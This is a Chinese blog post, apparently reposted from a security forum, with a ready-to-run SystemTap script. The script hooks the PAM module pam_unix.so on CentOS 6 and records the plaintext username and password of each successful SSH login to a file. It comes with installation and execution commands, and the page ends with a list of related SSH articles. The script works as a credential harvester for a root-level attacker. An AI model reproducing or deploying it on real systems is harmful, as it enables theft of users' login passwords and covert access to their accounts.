centos6.x 抓取ssh登录的用户名和密码
2023-09-14 09:01:20 时间
systemtap是一款非常强大内核调试工具,可以debug很多关于kernel层的问题。Linux是通过PAM模块检测用户信息和认证信息的,从而确定一个用户是否可以登录系统,利用这个知识点,使用systemtap捕获一下pam_unix.so该动态库文件的函数调用,获得用户在ssh远程登录时的用户名和密码吧。 测试环境:CentOS6.4 32bit 内核版本:2.6.32-358.el6.i686 首先安装以下rpm包 yum --releasever=6.4 update yum install -y systemtap debuginfo-install $(rpm -qf /lib/security/pam_unix.so) 创建文件,写入以下代码 touch /root/capture_pass.stp · #!/usr/bin/stap · global username, pass, isSuccRet = 1; · probe process("/lib/security/pam_unix.so").function("_unix_verify_password") · { · username = user_string($name); · pass = user_string($p); · } · probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return · { · if ($return == 0) · { · printf("User: %s\nPassword: %s\n\n", username, pass); · isSuccRet = 0; · } · } · probe process("/lib/security/pam_unix.so").function("pam_sm_open_session") · { · if (isSuccRet != 0) · { · printf("Login via ssh service.\n\User: %s\nPassword: %s\n\n", username, pass); · } · isSuccRet = 1; · } 赋予可执行权限 chmod +x capture_pass.stp 创建一个记录密码的文件 touch password.txt 执行systemstap脚本 stap capture_pass.stp -o password.txt 本地执行capture_pass.stp脚本,同时ssh远程登录系统,即使第一次登录失败也没有问题,不会记录尝试输入的错误密码。登录成功后ctl+C终止脚本运行,查看password.txt,成功捕获。systemstap很强大的利器,所以只有超户可以使用。来自:https://forum.90sec.org
相关文章
- ssh无密码登录多台机器,并让所有远程机执行相同命令
- redis desktop manager ssh方式连接redis
- ssh连接远程主机执行脚本的环境变量问题
- ssh根据姓名查询的时候报错java.lang.IndexOutOfBoundsException: Remember that
- 基于 OpenWrt 路由器和 SSH 的终极FQ解决方案
- 小米路由ssh管理
- [SSH] SSH Troubleshooting
- ssh-keygen配合ssh_config免密码登录VPS
- SSH使用ssh-keygen远程登录主机免输入密码
- 学习ssh之ssh无密码登陆
- 大规模集群自动化部署SSH无密码登陆
- 批量设置ssh无密码登陆脚本
- 解决ssh暴力破解服务器密码
- Docker - 创建支持SSH服务的容器镜像
- Linux 配置 ssh
- 使用id_rsa进行ssh连接minikube
- Linux SSH Access denied(拒绝访问)解决方案
- CentOS 7 实现 SSH 免密码远程登陆
- Ubuntu16.04如何发现隐藏的ssh登录行为
- ubuntu 16.04.7 LTS 开启ssh默认关闭ROOT账户远程密码连接
- ssh 免密码登录
- macOS iTerm2 自动登陆 设置ssh登陆用户名和密码
- mosh 基于UDP方式ssh连接 不怕掉线
- ssh免密码登陆远程服务器三种方式(三)
- Git SSH Key 生成步骤
- 基于CentOS容器镜像制作可ssh登录的docker镜像
- SSH 免密码登录 Openwrt 路由器
- 2022国赛22:免密码ssh登录到其他Linux主机